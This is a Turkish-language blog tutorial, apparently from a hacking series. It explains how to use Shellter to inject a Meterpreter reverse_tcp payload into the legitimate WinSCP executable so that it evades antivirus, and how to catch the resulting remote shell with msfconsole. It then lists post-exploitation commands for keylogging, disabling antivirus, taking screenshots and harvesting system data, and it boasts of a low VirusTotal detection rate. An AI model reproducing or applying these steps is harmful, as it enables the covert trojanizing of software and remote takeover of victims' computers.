Shellter Kurulumu,Kullanımı Ve Meterpreter Kullanımı

Bugünkü konumuzda Shellter isimli araç ile hedef sisteme arka kapı oluşturarak uzaktan erişim elde etmeyi göstereceğim.

Shellter Nedir?

Ücretsiz antivirüs atlatma aracıdır. Zararsız bir uygulamaya zararlı kod entegre ederek hedef sistem üzerinde arka kapı oluşturur.

Backdoor(Arka Kapı)Nedir? 

Hedef sistem üzerindeki güvenlik önlemlerini atlatarak,hedef sistem üzerinde uzaktan erişim hakkı kazanmayı sağlayan yazılımdır.

Shellter Kurulumu 

Öncelikle kurulumu ve meterpreter kullanımını Kali Linux işletim sistemi üzerinden göstereceğim. Kuruluma başlamadan önce Kali Linux işletim sisteminin paket güncellemesini yapmanızı şiddetle öneririm.

Güncelleme yaparken kullanacağımız komutlar;
sudo apt-get update && apt-get upgrade && apt-get dist-upgrade 

Shellter uygulamasını kullanabilmek için wine ve winbind isimli uygulama katmanlarını yüklememiz gerekmektedir.

Wine Kurulumu;
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Winbind Kurulumu;

sudo apt-get install winbind


Shell görevi atayacağım WinSCP programının indirme linki;
https://winscp.net/download/WinSCP-5.11.2-Portable.zip
Not: WinSCP programını seçme sebebim, Windows için SFTP yazılımı olduğu için backdoor işlemini atadığımızda Windows Güvenlik Duvarı tarafından virüs olarak farkedilmiyor. Normalde istediğiniz '.exe' uzantılı dosyaya shell atabilirsiniz.

Shellter aracını aşağıdaki bağlantı adresinden indiriyoruz;
https://www.shellterproject.com/download/


İndirdiğimiz "shellter.zip" adındaki dosyayı masaüstüne çıkarıyoruz.



"shellter" isimli dosyamızın içindeki "shellter.exe" isimli uygulamamızı masasüstüne atıyoruz.



WinSCP.exe isimli arka kapı atamasını yapacağım dosyayı da masaüstüne atıyoruz.


Shellter ile arka kapı atamasına başlayalım;

Terminal ekranına;

Adım-1:cd Desktop/ komutu ile masasütüne geçiş yapalım.
Adım-2:sudo wine shellter.exe komutu ile Shellter uygulamasını başlatalım.

Adım-3:Karşımıza çıkan soruda otomatik olarak yapılandırmayı seçeceğiz. "A"yazıp devam ediyoruz.

Adım-4: Bizden arka kapı ataması yapacağımız dosyayı istiyor.Ben masaüstüne attığım "WinSCP.exe"dosyasını tanıtıyorum.


Adım-5: Stealth Mode olup olmadığını istiyor.Stealth mode bir dosyaya birden fazla payload yüklenmesini sağlayan modüldür. Ben "Y" yazarak devam ediyorum.


Adım-6: Bizden yukarıda gösterilen payloadlardan herhangi birini veya kendi özel payloadı yükleyebileceğimizi soruyor.Biz yukarıda listelenen payloadlardan birini kullanacağımız için "L" yazarak devam ediyoruz.


Adım-7: Meterpreter_Reverse_TCP payloadını kullanacağımız için "1" yazarak devam ediyoruz.

Adım-8: Hedef sisteme arka kapıyı attığımızda sistemi yönetebilmek için kendi ip adresimizi LHOST bölümüne giriyoruz.IP adresimizi terminal ekranına ifconfig yazarak öğrenebiliriz.

Adım-9:Veri giriş çıkışının olacağı port numarasını bizden istiyor.Meterpreter_reverse_tcp payloadında kullanılan standart port 4444 olduğu için ben de LPORT bölümüne 4444 yazıyorum.



Ardından "Enter" tuşuna basarak işlemi tamamlamış oluyoruz.Masaüstünde oluşan dosyalarımız;


Msfconsole İle Meterpreter Kullanımı

Shell dosyamızı oluşturduk şimdi bağlantı kurulup kurulmadığını ve meterpreteri kullanabilmek için msfconsole üzerinden giriş yapacağız.

Adım-1: Terminal ekranın msfconsole yazıyoruz.


Adım-2: msfconsole açıldıktan sonra "use exploit/multi/handler" yazarak exploitimizi seçmiş oluyoruz.

Adım-3: Exploitimizi seçtikten sonra  "set payload/meterpreter/reverse_tcp" yazarak meterpreter payloadımızı seçmiş oluyoruz.

Adım-4: Shellter de tanıttığımız LHOST ve LPORT bilgilerini aynı şekilde burada tanıtıyoruz.




Adım-5: "run" yazarak hedef sistemin hazırlamış olduğumuz virüslü dosyayı açmasını bekliyoruz.


Msfconsole arka plan da açık durumda.Şimdi hazırladığımız arka kapıyı Windows 7 işletim sistemi üzerinde deneyelim;



Arka kapı yüklediğimiz uygulama windows güvenlik duvarı açık olmasına rağmen farketmedi.Program aynı şekilde çalışıyor ama arkada shell yüklü...

Şimdi msfconsole bölümüne geri dönelim;


Hedef sisteme meterpreter ile bağlandık.Kullanılan bazı meterpreter komutları;

  • screenshot: Hedef sistemden anlık ekran görüntüsü almamızı sağlayan komut.
  • run gettelnet -e: Hedef sistem üzerinde telnet aktifleştirir.
  • run winenum: Windows işletim sistemiyle ilgili ağ bilgileri(ip,arp tablosu,kullanıcı bilgileri)gibi çeşitli bilgileri toplar.
  • run killav: Hedef sistem üzerindeki anti virüs programını devre dışı bırakır.
  • run scraper: Hedef makine üzerinde otomatik bilgi toplamayı sağlar.
  • run keylogrecorder: Hedef sistem üzerinde basılan her tuşu kaydetmeye ve dinlemeye başlar.
Hazırladığımız arka kapı dosyasının virüs total sonucu;


67 adet virüs programlarından sadece 2 adet program virüs olarak algıladı ve bilindik virüs programları değiller.


Bugünkü konumuzda "Shellter Nedir?" , "Shellter Nasıl Kurulur?" , "Meterpreter Nasıl Kullanılır ?","Arka Kapı Dosyası Nasıl Oluşturulur?" sorularına yanıt verebilecek seviyeye geldik.



Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

(Bölüm-3 Siber Güvenlik) Aktif Bilgi Toplama

(Bölüm-2 Siber Güvenlik) Pasif Bilgi Toplama